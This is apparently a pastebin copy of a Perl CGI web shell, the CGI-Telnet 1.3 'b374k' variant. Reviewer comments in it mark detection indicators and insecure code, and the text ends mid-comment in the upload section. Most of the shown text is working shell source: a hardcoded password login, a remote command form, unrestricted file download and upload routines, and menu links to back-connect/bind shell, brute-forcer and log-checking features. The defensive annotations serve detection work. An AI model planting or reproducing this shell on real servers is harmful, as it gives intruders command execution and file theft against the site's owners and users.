0xspade

CGI Telnet

Oct 24th, 2016
#!/usr/bin/perl -I/usr/local/bandmin
# NOTE(review): no `use strict` / `use warnings` anywhere in this part of the
# file; every variable below is a package global shared between the subs.
use MIME::Base64;   # imported here but not referenced anywhere in this view
# Version banner. "CGI-Telnet Version 1.3" and the "b374k - CGI-Telnet" markup
# below are fixed strings emitted into every page and are the kind of literal a
# detection rule for this shell family can key on.
$Version= "CGI-Telnet Version 1.3";
$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>b374k - CGI-Telnet</font>";
 
# Cleartext credential embedded in the script body; PerformLogin compares the
# submitted value against it with a plain string `eq`.
$Password = "spade";            # Change this. You will need to enter this
                # to login.
#------------------------------------------------------------------------------
# Returns 1 when SERVER_SOFTWARE contains "win" (case-insensitive), else 0.
# Used once, to initialise $WinNT. `trim` is not defined in this part of the
# file — presumably later on. The empty `()` prototype has no effect here
# because the caller uses the `&Is_Win()` form, which bypasses prototypes.
#------------------------------------------------------------------------------
sub Is_Win(){
    $os = &trim($ENV{"SERVER_SOFTWARE"});   # $os is a package global, not `my`
    if($os =~ m/win/i){
        return 1;
    }
    else{
        return 0;
    }
}
# NOTE(review): the comment to the right is stale — $WinNT is now derived from
# SERVER_SOFTWARE by Is_Win() rather than edited by hand.
$WinNT = &Is_Win();             # You need to change the value of this to 1 if
                                # you're running this script on a Windows NT
                                # machine. If you're running it on Unix, you
                                # can leave the value as it is.
 
$NTCmdSep = "&";                # This character is used to seperate 2 commands
                                # in a command line on Windows NT.
 
$UnixCmdSep = ";";              # This character is used to seperate 2 commands
                                # in a command line on Unix.
 
# NOTE(review): 10000 seconds (~2.8 hours) contradicts the "don't set this to a
# very large value" advice below; CommandTimeout is the sub that reports expiry.
$CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
                                # Don't set this to a very large value. This is
                                # useful for commands that may hang or that
                                # take very long to execute, like "find /".
                                # This is valid only on Unix servers. It is
                                # ignored on NT Servers.
 
$ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
                                # browser as soon as it is output, otherwise
                                # it is buffered and send when the command
                                # completes. This is useful for commands like
                                # ping, so that you can see the output as it
                                # is being generated.
 
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
 
# Platform-dependent derived settings. None of them is used in this view; they
# are read by the command-execution code, which is not shown here.
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
# Shell redirection suffix appended to commands; the Unix form merges stderr
# into stdout ("1>&1" is a no-op).
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
$cols= 150;     # presumably textarea/terminal dimensions; not used in this view
$rows= 26;
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#
# Review notes:
#  - Three distinct package globals share the name "in": the scalar $in (raw
#    request body / query string), the array @in (split pairs) and the hash
#    %in (parsed parameters). `local (*in)` aliases all of them at once.
#  - The multipart boundary taken from the client's Content-Type header is
#    interpolated into the split() pattern unescaped, so regex metacharacters
#    in it are interpreted rather than matched literally.
#  - $in{'f'} keeps whatever the client sent in filename="..." apart from
#    quotes and whitespace; path separators are not stripped here (UploadFile
#    later keeps only the basename).
#  - Repeated keys in url-encoded input are joined with "\0".
#------------------------------------------------------------------------------
sub ReadParse
{
    local (*in) = @_ if @_;
    local ($i, $loc, $key, $val);
   
    # Scalar result of the match (1 or ""); the boundary captured here is not
    # used — the same pattern is matched again below.
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
 
    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        # Bitwise `&` rather than `&&`; only works because both sides are 0/1-ish.
        binmode(STDIN) if $MultipartFormData & $WinNT;
        # Reads exactly CONTENT_LENGTH bytes as declared by the client.
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }
 
    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        @list = split(/$Boundary/, $in);   # $Boundary used as a regex, not quotemeta'd
        $HeaderBody = $list[1];
        # Split the first part into headers ($`) and body ($') at the first blank line.
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
        $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;
 
        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;   # percent-decode
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        @in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));   # multi-valued keys
            $in{$key} .= $val;
        }
    }
}
 
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#
# Review notes:
#  - Emits the HTTP "Content-type" header itself, so it must be the first
#    output of a response (PerformLogout prints its Set-Cookie line before
#    calling it, which is fine because the blank line is printed here).
#  - The heredoc interpolates package globals ($HtmlMetaHeader, $EditPersion,
#    $ScriptLocation, $EncodedCurrentDir) and the argument list `@_` (inside
#    the body onLoad attribute). $HtmlMetaHeader is set by PrintDownloadLinkPage
#    to a meta-refresh tag; otherwise it is whatever the global already holds.
#  - $dir is $CurrentDir with backslashes doubled and nothing else escaped, and
#    it is dropped straight into JavaScript string literals and href values.
#    HtmlSpecialChars exists in this file but is not used here.
#  - The page discloses SERVER_SOFTWARE, SERVER_ADDR and REMOTE_ADDR, and the
#    fixed strings (title "Hacsugia", nav labels "Back & Bind", "Brute Forcer",
#    "Check Log", "Domains/Users", query values a=backbind / a=bruteforcer /
#    a=checklog / a=domainsuser) are stable indicators for content signatures
#    and web-log hunting.
#------------------------------------------------------------------------------
sub PrintPageHeader
{
    # Percent-encode every non-alphanumeric byte of $CurrentDir for use in hrefs.
    $EncodedCurrentDir = $CurrentDir;
    $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
    my $dir =$CurrentDir;
    $dir=~ s/\\/\\\\/g;
    print "Content-type: text/html\n\n";
    print <<END;
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Hacsugia</title>
 
$HtmlMetaHeader
 
</head>
<style>
body{
font: 10pt Verdana;
}
tr {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #ff9900;
}
td {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #2BA8EC;
font: 10pt Verdana;
}
 
table {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #111;
}
 
 
input {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: Black;
font: 10pt Verdana;
color: #ff9900;
}
 
input.submit {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF;
border-color: #009900;
}
 
code {
border          : dashed 0px #333;
BACKGROUND-COLOR: Black;
font: 10pt Verdana bold;
color: while;
}
 
run {
border          : dashed 0px #333;
font: 10pt Verdana bold;
color: #FF00AA;
}
 
textarea {
BORDER-RIGHT:  #3e3e3e 1px solid;
BORDER-TOP:    #3e3e3e 1px solid;
BORDER-LEFT:   #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #1b1b1b;
font: Fixedsys bold;
color: #aaa;
}
A:link {
    COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:visited {
    COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:hover {
    text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
    color: #ff9900; TEXT-DECORATION: none
}
A:active {
    color: Red; TEXT-DECORATION: none
}
 
.listdir tr:hover{
    background: #444;
}
.listdir tr:hover td{
    background: #444;
    text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
    color: #FFFFFF; TEXT-DECORATION: none;
}
.notline{
    background: #111;
}
.line{
    background: #222;
}
</style>
<script language="javascript">
function chmod_form(i,file)
{
    /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
    var ajax="";
    document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
    document.getElementById("text_" + i).focus();
}
function rm_chmod_form(response,i,perms,file)
{
    response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
}
function rename_form(i,file,f)
{
    var ajax="";
    f.replace(/\\\\/g,"\\\\\\\\");
    var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
    document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
    document.getElementById("text_" + i).focus();
}
function rm_rename_form(i,file,f)
{
    if(f=='f')
    {
        document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
    }else
    {
        document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
    }
}
</script>
<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<center><code>
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
    <td align="center" rowspan=2>
        <b><font size="5">$EditPersion</font></b>
    </td>
 
    <td>
 
        <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
    </td>
    <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
    </td>
 
</tr>
 
<tr>
<td colspan="3"><font face="Verdana" size="2">
<a href="$ScriptLocation">Home</a> |
<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> |
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
 
<a href="$ScriptLocation?a=backbind">Back & Bind</a> |
<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
<a href="$ScriptLocation?a=checklog">Check Log</a> |
<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
<a href="$ScriptLocation?a=logout">Logout</a> |
<a target='_blank' href="#">Help</a>
 
</font></td>
</tr>
</table>
<font id="ResponseData" color="#ff99cc" >
END
}
 
#------------------------------------------------------------------------------
# Prints the Login Screen
#
# Review notes:
#  - Purely cosmetic: a "typing" animation plus a fake connection transcript.
#    No authentication happens here.
#  - The heredoc interpolates $ServerName (a package global set elsewhere —
#    not visible in this view); `\$` yields a literal "$" in the output.
#  - The table cell background is loaded by the *browser* from an external
#    dl.dropbox.com URL, so viewing the shell produces an outbound fetch that
#    shows up in proxy logs. The "Copyright (C) 2001 Rohitab Batra" line is
#    the original CGI-Telnet attribution; together with the dropbox URL and the
#    "OK! You can kill it!" transcript it is a stable content signature.
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
 
    print <<END;
<pre><script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;    // Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
    this.currentText = "";
    this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script>
</pre>
 
<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 Rohitab Batra </font><br><br>
<table align="center" border="1" width="600" heigh>
<tbody><tr>
<td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
 
<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
 
<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
 
<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
</tr>
</tbody></table>
<br>
 
<script type="text/javascript">
new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
TypingText.runAll();
 
</script>
END
}
 
#------------------------------------------------------------------------------
# Add html special chars
# Escapes &, ", ', < and > in $text and returns the escaped copy (the argument
# is not modified). NOTE(review): this is the only output-escaping helper in
# the file, and none of the header/form subs in this view call it — they
# interpolate $CurrentDir and friends into HTML and JavaScript as-is.
# The `($)` prototype is irrelevant for callers that use the `&Name(...)` form.
#------------------------------------------------------------------------------
sub HtmlSpecialChars($){
    my $text = shift;
    $text =~ s/&/&amp;/g;    # must run first so later entities are not double-escaped
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#039;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    return $text;
}
#------------------------------------------------------------------------------
# Add link for directory
# Builds a breadcrumb of <a href='?a=ACTION&d=PATH'> links, one per component
# of $CurrentDir, where ACTION is the single argument (e.g. "command").
# Returns the HTML string. Unlike PrintPageHeader's $EncodedCurrentDir, the
# path components here are neither URL-encoded nor HTML-escaped. `trim` is
# not defined in this part of the file.
#------------------------------------------------------------------------------
sub AddLinkDir($)
{
    my $ac=shift;
    my @dir=();
    if($WinNT)
    {
        @dir=split(/\\/,$CurrentDir);
    }else
    {
        @dir=split("/",&trim($CurrentDir));
    }
    my $path="";
    my $result="";
    foreach (@dir)   # $_ is the current path component
    {
        $path .= $_.$PathSep;
        $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
    }
    return $result;
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
# The "Login : Administrator" / "Login incorrect" text mimics a telnet prompt;
# the username is fixed text, only the password is checked (see PerformLogin).
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
    print <<END;
<br>Login : Administrator<br>
 
Password:<br>
Login incorrect<br><br>
END
}
 
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
# Posts a=login and the password field p to $ScriptLocation. The form is
# named "f" so PrintPageHeader's onLoad handler (document.f.<arg>.focus()) can
# focus the "p" field. Requests with a=login and a p parameter are the login
# attempts to look for in access logs.
#------------------------------------------------------------------------------
sub PrintLoginForm
{
    print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
Login : Administrator<br>
Password:<input type="password" name="p">
<input class="submit" type="submit" value="Enter">
</form>
END
}
 
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
# Closes the <code>/<center>/<body>/<html> elements opened by PrintPageHeader
# and repeats the $EditPersion banner ("b374k - CGI-Telnet").
#------------------------------------------------------------------------------
sub PrintPageFooter
{
    print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
}
 
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{'name'}
#
# Review notes:
#  - split(/=/, $cookie) has no limit, so a cookie value containing "=" is
#    truncated at its first "=".
#  - Populates the package global %Cookies; the consumer of the SAVEDPWD
#    cookie that PerformLogin sets is not in this view (presumably it feeds
#    $LoginPassword — verify in the rest of the file).
#------------------------------------------------------------------------------
sub GetCookies
{
    @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
    foreach $cookie(@httpcookies)
    {
        ($id, $val) = split(/=/, $cookie);
        $Cookies{$id} = $val;
    }
}
 
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
# The text imitates the telnet client's disconnect message; it is a fixed
# string useful for response-body signatures.
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
    print "Connection closed by foreign host.<br><br>";
}
 
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#
# Review notes:
#  - The Set-Cookie line is printed before PrintPageHeader emits Content-type
#    and the terminating blank line, which is why the order of calls matters.
#  - The cookie is blanked (SAVEDPWD=) but carries no Expires/Max-Age, so the
#    browser keeps an empty session cookie rather than deleting it.
#  - Ends the request with exit.
#------------------------------------------------------------------------------
sub PerformLogout
{
    print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
    &PrintPageHeader("p");
    &PrintLogoutScreen;
 
    &PrintLoginScreen;
    &PrintLoginForm;
    &PrintPageFooter;
    exit;
}
 
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#
# Review notes:
#  - $LoginPassword is a package global set elsewhere (not in this view).
#  - The check is a plain `eq` against the cleartext $Password constant.
#  - On success the submitted password is written back verbatim into the
#    SAVEDPWD cookie, so the credential travels in cleartext on every later
#    request; any proxy or TLS-terminating device in the path sees it, and a
#    "Set-Cookie: SAVEDPWD=" response header is a strong indicator of a
#    successful login to this shell.
#  - `&PrintPageHeader;` (no parens) passes this sub's own @_ through, which
#    ends up in the body onLoad attribute; ListDir is not defined in this view.
#------------------------------------------------------------------------------
sub PerformLogin
{
    if($LoginPassword eq $Password) # password matched
    {
        print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
        &PrintPageHeader;
        print &ListDir;
    }
    else # password didn't match
    {
        &PrintPageHeader("p");
        &PrintLoginScreen;
        if($LoginPassword ne "") # some password was entered
        {
            &PrintLoginFailedMessage;
 
        }
        &PrintLoginForm;
        &PrintPageFooter;
        exit;   # only the failure path terminates the request here
    }
}
 
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
# Returns (does not print) the form HTML. The form posts a=command, d=<dir>
# and the command text c to $ScriptLocation. $CurrentDir is interpolated into
# the hidden "d" value attribute without escaping; $Prompt is a package global
# (not `my`) and $ServerName is set elsewhere in the file.
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
    my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
    $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
    return <<END;
<form name="f" method="POST" action="$ScriptLocation">
 
<input type="hidden" name="a" value="command">
 
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" size="50" name="c">
<input class="submit"type="submit" value="Enter">
</form>
END
}
 
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
# Returns (does not print) the form HTML. Posts a=download, d=<dir> and the
# filename f; DownloadFile resolves f relative to d unless it is absolute.
# $CurrentDir is interpolated into the hidden value attribute unescaped.
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
    my $dir = &AddLinkDir("download");
    $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
    return <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input class="file" type="text" name="f" size="35"><br><br>
Download: <input class="submit" type="submit" value="Begin">
 
</form>
END
}
 
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
# Returns (does not print) a multipart/form-data form with fields f (file),
# o=overwrite (checkbox), d=<dir> and a=upload; ReadParse stores the upload
# in $in{'filedata'} and UploadFile writes it into d. A multipart POST with
# a=upload to this script is the request shape to alert on.
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
    my $dir= &AddLinkDir("upload");
    $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
    return <<END;
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input class="file" type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
<label for="up">Overwrite if it Exists</label><br><br>
Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input class="submit" type="hidden" name="a" value="upload">
 
</form>
 
END
}
 
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#
# Review notes:
#  - alarm(0) cancels any pending alarm; where the alarm is armed and how this
#    sub is wired up as the handler is not visible in this view.
#  - Returns the "Command exceeded maximum time" HTML on Unix and nothing on
#    Windows. Despite the comment it does not itself terminate the script.
#------------------------------------------------------------------------------
sub CommandTimeout
{
    if(!$WinNT)
    {
        alarm(0);
        return <<END;
</textarea>
<br><font color=yellow>
Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
<br><font size='6' color=red>Killed it!</font>
END
    }
}
 
 
 
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#
# Review notes:
#  - The only existence check is `-e`; there is no restriction to a base
#    directory, so any path the web-server user can stat is accepted.
#  - Sets the package global $HtmlMetaHeader to a 1-second meta refresh
#    pointing at a=download&f=<encoded path>&o=go, then calls PrintPageHeader
#    (which prints directly) while the rest of the page is *returned* as a
#    string — callers must print the result.
#  - The "Sending File" message uses the global $TransferFile, not the
#    argument.
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
    local($FileUrl) = @_;
    my $result="";
    if(-e $FileUrl) # if the file exists
    {
        # encode the file link so we can send it to the browser
        $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
        $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
        &PrintPageHeader("c");
        $result .= <<END;
Sending File $TransferFile...<br>
 
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>
END
        $result .= &PrintCommandLineInputForm;
    }
    else # file doesn't exist
    {
        $result .= "Failed to download $FileUrl: $!";
        $result .= &PrintFileDownloadForm;
    }
    return $result;
}
 
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#
# Review notes:
#  - This is the file-exfiltration primitive of the shell: the path comes
#    from the request (via DownloadFile's $TransferFile), no base directory
#    is enforced, and the only failure mode is open() failing. Downloads by
#    the web-server user of files outside the document root are the activity
#    to look for.
#  - Two-argument open() with a request-supplied name: Perl honours mode
#    characters in the name itself (see the 3-arg open guidance), so the
#    "name" can select more than a plain read.
#  - On success the whole file is streamed and the script exit(1)s; the
#    `return $result` is reached only on the failure path.
#  - $Filename is assigned but never used; the Content-Disposition filename
#    is taken from $1 of the preceding match (basename after the last / or \).
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
    my $result = "";
    local($SendFile) = @_;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];
        ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        print while(<SENDFILE>);
        close(SENDFILE);
        exit(1);
    }
    else # failed to open file
    {
        $result .= "Failed to download $SendFile: $!";
        $result .=&PrintFileDownloadForm;
    }
    return $result;
}
 
 
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#
# Review notes:
#  - Duplicates the path-resolution and dispatch logic of DownloadFile below
#    but discards the return values of the two helpers. No caller is visible
#    in this view; it looks superseded by DownloadFile — confirm before
#    relying on either.
#  - Reads the package globals $TransferFile, $CurrentDir and $Options, which
#    are set elsewhere (presumably from %in).
#  - Uses bitwise `&`/`|` on the 1/"" results of the regex matches instead of
#    `&&`/`||`; it happens to work for these operand values.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        # strip one trailing separator from $CurrentDir, then append the name
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }
 
    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}
 
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#
# Review notes:
#  - This is the arbitrary-file-write primitive of the shell: the target is
